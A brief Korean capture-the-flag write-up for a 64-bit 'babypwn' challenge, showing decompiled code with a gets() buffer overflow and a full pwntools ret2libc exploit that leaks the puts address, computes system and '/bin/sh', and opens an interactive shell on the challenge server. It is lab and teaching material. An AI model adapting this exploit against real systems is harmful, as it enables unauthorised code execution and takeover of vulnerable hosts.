Hanctf Babypwn Writeup

LeeDoHyun · April 14, 2020

64bit rop문제 입니다.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-100h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  puts("Give me dataaaaaaaaaaaaa");
  gets(&s, 0LL);                                // buffer overflow
  return puts(&s);
}

코드를 보면 취약점이 딱 보일정도로 간단한 문제입니다. pop rdi gadget으로 puts를 leak해준뒤 system함수와, binsh함수 주소를 구해준뒤 익스플로잇 하면됩니다.

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *

#context.log_level = 'debug'
IP = 'pwn.koreahacker.kro.kr'
PORT = '12370'
r = remote(IP, PORT)
#r = process('./challenge')
e = ELF('./challenge')
#libc = e.libc
libc = ELF('libc-2.27.so')

ret_gadget = 0x4004c9
pop_rdi_gadget = 0x400703
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = e.symbols['main']

r.recvuntil('Give me dataaaaaaaaaaaaa')
payload = 'A'*(0x100 + 0x8)
payload += p64(pop_rdi_gadget)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendline(payload)

puts_leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
libc_base = puts_leak - libc.symbols['puts']
system_function = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

info('puts leak addr : ' + hex(puts_leak))
info('libc base addr : ' + hex(libc_base))
info('system_function addr : ' + hex(system_function))
info('binsh addr : ' + hex(binsh))

r.recvuntil('Give me dataaaaaaaaaaaaa')
payload = 'A'*(0x100 + 0x8)
payload += p64(pop_rdi_gadget)
payload += p64(binsh)
payload += p64(ret_gadget)
payload += p64(system_function)
r.sendline(payload)
r.interactive()

Twitter, Facebook